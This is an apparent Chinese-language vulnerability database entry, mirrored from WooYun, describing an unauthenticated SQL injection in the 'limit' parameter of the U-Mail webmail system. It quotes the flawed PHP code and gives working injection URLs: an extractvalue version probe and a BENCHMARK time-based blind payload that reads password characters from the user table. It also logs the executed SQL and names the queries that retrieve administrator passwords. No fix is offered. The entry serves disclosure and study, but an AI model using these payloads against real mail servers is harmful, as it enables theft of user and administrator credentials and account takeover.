U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录，附获取用户密码脚本)

基本字段

漏洞编号：: SSV-95434

披露/发现时间：: 2015-01-30

提交时间：: 2015-01-30

漏洞等级：

漏洞类别：: 其他类型

影响组件：: U-Mail

漏洞作者：: Ano_Tom

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-094661

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： SQL Injections in MySQL LIMIT clause，过滤不严，产生盲注，导致可以注射用户名与密码，无需登录 ### 详细说明：上次搜索只在client搜索，今天无意在fast目录下搜索了下，又发现了一处。注：client的目录下的所有函数必须登录才可以执行，fast的目录无需登录可以执行部分存在的函数，但并不能查看邮件等等。漏洞与上一个原理一样，但文件不同，此处访问权限设置不严格，可以任意用户访问，导致可以无需登录即可sql注入，limit无法使用sleep，用benchamark延时漏洞文件/fast/oab/module/operates.php代码 ``` if ( ACTION == "member-get" ) { $dept_id = gss( $_GET['dept_id'] ); $keyword = gss( $_GET['keyword'] ); $page = $_GET['page'] ? gss( $_GET['page'] ) : 1; //limit $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量 $orderby = gss( $_GET['orderby'] ); $is_reverse = gss( $_GET['is_reverse'] ); $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 ); $department_list = create_array( $data_cache, "dept_id", "name" ); $where = ""; if ( $dept_id && $dept_id != "-1" ) { $Tree = $Department->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $dept_ids = $Tree->get_child_id( $dept_id ); $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 ); $where = "t1.UserID IN (".$user_ids.")"; } if ( $keyword ) { if ( $where ) { $where .= " AND "; } if ( strpos( $keyword, "@" ) ) { $key_tmp = explode( "@", $keyword ); $keyword = $key_tmp[0]; } $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")"; } switch ( $orderby ) { case "fullname" : $orderby = "t1.FullName"; break; case "mailbox" : $orderby = "t1.Mailbox"; break; case "sex" : $orderby = "t2.sex"; break; case "birthday" : $orderby = "t2.birthday"; break; case "mobile" : $orderby = "t2.mobil"; break; case "tel" : $orderby = "t2.teleextension"; break; case "position" : $orderby = "t2.headship"; break; case "group_num" : $orderby = "t2.o_group"; break; case "email" : $orderby = "t1.Mailbox"; break; $orderby = ""; } $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数 ``` $limit可控，因而产生了注入，注入利用过程首先向url post数据，(注，其实该接口并非是任意登录，执行后仅可以执行仅有的几个函数，所以如果执行了有sql缺陷的函数，则产生相应了相应的无需登录的sql注入问题，如可以update密保问题则产生了获得任意用户密码的缺陷，但可访问的函数有限，并不能查看用户邮件等等) [<img src="https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png) 获得认证后，执行如下 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1) 发现结果如下 [<img src="https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png" alt="b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png) 其执行的sql语句为 ``` 150128 21:44:43 3142 Connect umail@localhost on 3142 Query SET NAMES 'UTF8' 3142 Init DB umail 3142 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1) 3142 Quit ``` [<img src="https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png" alt="c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png) 由于未执行错误回显，因而我们实施盲注，代码为 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1) [<img src="https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png) 其sql代码为 ``` 150128 21:47:16 3144 Connect umail@localhost on 3144 Query SET NAMES 'UTF8' 3144 Init DB umail 3144 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1) ``` 成功注入因而可以通过脚本跑不同的用户帐号和密码，管理员的 #select+password+from+userlist+where+userid=2 system用户 #select+password+from+web_usr+where+usr_code=1 administrator用户 #select+password+from+web_usr+where+usr_code=2 admin用户普通用户的话遍历userid获取username password即可。附盲注脚本（脚本写的一半，未用二分法等，将就用）本地测试 [<img src="https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg" alt="j.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg) 以及官网管理登录截图 [<img src="https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png" alt="e.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png) [<img src="https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png" alt="f.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png) ### 漏洞证明：如上

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-094661

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录，附获取用户密码脚本)

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录，附获取用户密码脚本)

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定